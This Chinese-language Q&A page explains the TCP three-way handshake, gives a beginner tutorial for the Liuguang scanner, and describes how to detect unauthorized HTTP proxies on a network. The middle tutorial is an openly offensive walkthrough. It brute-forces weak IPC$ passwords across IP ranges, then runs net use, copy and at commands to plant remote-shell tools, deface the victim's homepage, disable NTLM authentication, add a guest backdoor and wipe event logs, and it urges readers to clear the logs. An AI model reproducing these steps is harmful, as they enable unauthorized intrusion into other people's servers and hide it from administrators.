拉伸端口三要素_拉伸端口扫描多少倍

hacker|
162

TCP/IP三次握手具体过程?

一、TCP握手协议

在TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立一个连接。

第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;

第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;

第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手。

完成三次握手,客户端与服务器开始传送数据,在上述过程中,还有一些重要的概念:

未连接队列:在三次握手协议中,服务器维护一个未连接队列,该队列为每个客户端的SYN包(syn=j)开设一个条目,该条目表明服务器已收到SYN包,并向客户发出确认,正在等待客户的确认包。这些条目所标识的连接在服务器处于Syn_RECV状态,当服务器收到客户的确认包时,删除该条目,服务器进入ESTABLISHED状态。

Backlog参数:表示未连接队列的最大容纳数目。

SYN-ACK 重传次数 服务器发送完SYN-ACK包,如果未收到客户确认包,服务器进行首次重传,等待一段时间仍未收到客户确认包,进行第二次重传,如果重传次数超过系统规定的最大重传次数,系统将该连接信息从半连接队列中删除。注意,每次重传等待的时间不一定相同。

半连接存活时间:是指半连接队列的条目存活的最长时间,也即服务从收到SYN包到确认这个报文无效的最长时间,该时间值是所有重传请求包的最长等待时间总和。有时我们也称半连接存活时间为Timeout时间、SYN_RECV存活时间。

求流光5.0的使用方法(要浅显易懂)

流光5.0的使用方法

1:流光概述

流光是小容的作品,这款工具可以让一个只会点击鼠标的人成为专业的黑客,这样说一点也不夸张。它可以探测POP3,FTP,HTTP,PROXY,FROM,SQL,SMTP,IPC,等各种漏洞。并针对个中漏洞设计不同的破解方案。

2:流光使用:

步骤1:打开高级扫描向导设置扫描参数

“文件”--}“高级扫描向导”

--}在“起始”/“结束”位置填入,你要扫描的IP段。

--}在“ 目标系统”中选择你要检测的操作系统。

--}在“获取主机名”、“PING检查”前面打勾

--}在“检测项目”中选择“全选”

--}然后单击“下一步”选择“标准端口扫描”

说明:“标准断口”只对常见的断口进行扫描。

“自定义”可以自己定义进行扫描。

--}然后单击“下一步” 设置好所有检测项目后点击“下一步”

--}在选择主机界面选择“本地主机”使用本地主机进任务扫描。

步骤2:单击“开始”扫描过程中要想停止选择“取消”不过要等一段时间。

步骤3:查看扫描报告。扫描结束之后给出“HTLM”格式的报告

方法二:

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:)

流光的IPC探测:

一、目的和任务:

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程:

1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

什么是IPC:

IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。

注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令,本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||

7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:

执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

9、还能做成其他的么 ?

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)

10、日志清除,断开连接 :

执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete

流光简介

流光4.7)一个绝好的ftp、pop3解密工具,界面豪华,功能强大!功能简介如下:1、用于检测POP3/FTP主机中用户密码安全漏洞。2、163/169双通。3、多线程检测,消除系统中密码漏洞。4、高效的用户流模式。5、高效服务器流模式,可同时对多台POP3/FTP主机进行检测。6、最多500个线程探测。7、线程超时设置,阻塞线程具有自杀功能,不会影响其他线程。8、支持10个字典同时检测。9、检测设置可作为项目保存。10、取消了国内IP限制而且免费。

流光4.7新增功能:

1、加入了本地模式,在本机运行是不必安装Sensor。

2、Sensor扫描临时结果文件(*.PTR)的尺寸大约减少了10倍。

3、后台扫描模式时,扫描的结果(*.PTR)可以直接通过附件发送到信箱。

4、Sensor的扫描速度加快。

5、减少了Sensor异常退出的BUG。

6、流光的界面和Sensor之间的通讯采用Triple-DES,密钥的长度最多可到192bits,保证整个传输过程不可监听。扫描的结果也只有在密钥正确的情况下才可阅读。

7、修正的控制服务,新的控制服务在升级Sensor时不再会失败。

8、Sensor的服务名称可以任意指定,控制服务和Sensor的进程名称也可以任意指定。

9、支持XP(本地模式),很快会有98/ME的版本。

我是也是新手这是我找的东西!你自己照着做几遍就会了!记得一定要清理好系统日至!!

如何检测服务器上有没有人开代理?

说到代理服务器,概念太大了,HTTP Proxy/FTP Proxy/SMTP Proxy/Telnet Proxy/Socks Proxy等等都是代理服务器。

我们常用的代理服务器,其实也就是HTTP Proxy,下面将会针对如何发现内部网络的非法HTTP Proxy来进行分析。

1) 流量监控

若是有条件的话,进行流量监控是个不错的选择,代理别人的机器,其流量会比一般机器的平均流量大几倍,从流量,可以发现可疑的用户,不过,仅仅根据流量,你是没有证据说他用了代理软件的,碰上一些有资历的或者刁蛮的用户,你反而会吃不了兜着走。

2) 端口扫描

开一个SuperScan或者你所喜欢的扫描器,对某些网段进行端口扫描,然后再在扫描的结果中人工寻找可疑目标,比如那些开放了8080/3128什么的端口,多半是HTTP Proxy,最后再用代理猎手来确认,或者自己利用HTTP协议来手工确认。

不过,端口扫描仅仅是对菜鸟有用,高手会把自己的端口改成一个很怪异很高数值的端口(谁会愿意每隔一段时间去扫描几个网段的IP的1-64K的端口?)甚至,他还可以把代理服务器的端口仅仅开在他的内部IP上(就是那个接其它需要非法上网机器的非法IP),这样你从你的内部网络,是不可能用通常手段扫描到他的内部IP到底开了哪些端口的。

3) SNIFFER

以上的两个方法对侦测HTTP Proxy都不是太有效,不得已,我们可能需要从HTTP协议本身来下手分析某个HTTP请求是否用了非法的代理服务器。为了分析HTTP协议,首先要做的就是SNIFFER,若你真的是网络管理员,我想你是有办法来搞到某个IP对外的HTTP请求甚至是整个内部网络所有的对外的HTTP请求。(特别提醒:交换环境下做Sinferr监控必须在交换机上配置镜像端口或者在相应出口上接一HUB)

首先来看看标准的HTTP协议,HTTP协议分HTTP请求和HTTP应答两部分,在通常的情况下,HTTP请求由浏览器发出,而HTTP应答是由HTTP Server来发出。HTTP Proxy在这里会做一个中间人的位置,以自己的身份向HTTP服务器发起请求,这个HTTP请求的主要内容来自HTTP Client发给HTTP Proxy的请求,但是某些细节可能会有改变,HTTP Proxy甚至会加一些信息进去。这时我们就要对这些数据包进行Sinferr,只要我们发现某个HTTP请求中有HTTP Proxy加进去的信息,那么我们就可以判断某个IP是HTTP Proxy了,甚至可以判断出真正提交这个HTTP请求的非法用户的真实IP。

具体进行数据包分析的理论就不贴了,我们大家关心的是怎么去实现它。

值得高兴的是,这里已经有人写了一个页面,可以直接检测本机用户是否用了代理,大家可以检查你用的是否是http代理上网:

然后我们就可以改改这个脚本(下载那个proxy-detect.php),让它把log信息记录到一文本文件中,然后伪装成图片(以前版上经常有人搞那玩意儿)或者用其它的形式包含到一个内部网用户都要访问的一个网页上面去。(说白了就是一个陷阱)。我们只需要定期去检查日志文件里有没有人中标就行了。

0条大神的评论

发表评论